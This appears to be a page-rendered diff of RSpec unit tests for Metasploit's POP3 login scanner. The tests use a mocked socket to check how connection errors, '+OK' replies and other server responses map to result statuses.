it "Rex::ConnectionError should result in status :connection_error" do
|
||||||
|
expect(scanner).to receive(:connect).and_raise(Rex::ConnectionError)
|
||||||
|
result = scanner.attempt_login(pub_blank)
|
||||||
|
|
||||||
|
expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
|
||||||
|
expect(result.status).to eq(:connection_error)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "Timeout::Error should result in status :connection_error" do
|
||||||
|
expect(scanner).to receive(:connect).and_raise(Timeout::Error)
|
||||||
|
result = scanner.attempt_login(pub_blank)
|
||||||
|
|
||||||
|
expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
|
||||||
|
expect(result.status).to eq(:connection_error)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "EOFError should result in status :connection_error" do
|
||||||
|
expect(scanner).to receive(:connect).and_raise(EOFError)
|
||||||
|
result = scanner.attempt_login(pub_blank)
|
||||||
|
|
||||||
|
expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
|
||||||
|
expect(result.status).to eq(:connection_error)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
context "Open Connection" do
|
||||||
|
let(:sock) {double('socket')}
|
||||||
|
|
||||||
|
before(:each) do
|
||||||
|
sock.stub(:shutdown)
|
||||||
|
sock.stub(:close)
|
||||||
|
sock.stub(:closed?)
|
||||||
|
expect(scanner).to receive(:connect)
|
||||||
|
scanner.stub(:sock).and_return(sock)
|
||||||
|
scanner.should_receive(:select).with([sock],nil,nil,0.4)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "Server returns +OK" do
|
||||||
|
expect(sock).to receive(:get_once).exactly(3).times.and_return("+OK")
|
||||||
|
expect(sock).to receive(:put).with("USER public\r\n").once.ordered
|
||||||
|
expect(sock).to receive(:put).with("PASS \r\n").once.ordered
|
||||||
|
|
||||||
|
result = scanner.attempt_login(pub_blank)
|
||||||
|
|
||||||
|
expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
|
||||||
|
expect(result.status).to eq(:success)
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
it "Server Returns Something Else" do
|
||||||
|
sock.stub(:get_once).and_return("+ERROR")
|
||||||
|
|
||||||
|
result = scanner.attempt_login(pub_blank)
|
||||||
|
|
||||||
|
expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
|
||||||
|
expect(result.status).to eq(:failed)
|
||||||
|
expect(result.proof).to eq("+ERROR")
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue